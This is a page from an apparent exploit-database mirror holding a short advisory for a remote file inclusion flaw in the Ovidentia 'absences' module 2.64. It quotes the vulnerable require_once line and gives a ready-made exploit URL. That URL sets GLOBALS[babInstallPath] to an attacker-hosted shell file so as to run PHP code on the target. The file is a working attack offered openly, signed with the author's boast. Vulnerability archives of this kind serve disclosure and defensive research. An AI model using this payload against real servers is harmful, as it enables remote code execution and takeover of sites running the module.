bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/38981.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
895 B
Text
Raw Blame History

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880
Proof-of-Concept:
/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------
require_once $GLOBALS['babInstallPath'].'utilit/defines.php';
---------------------------------------------------------------
[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?
Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
So an attacker can use this to execute some php-shellcode for example.
### The 27 years old, german hacker bd0rk ###
Reference in a new issue View git blame Copy permalink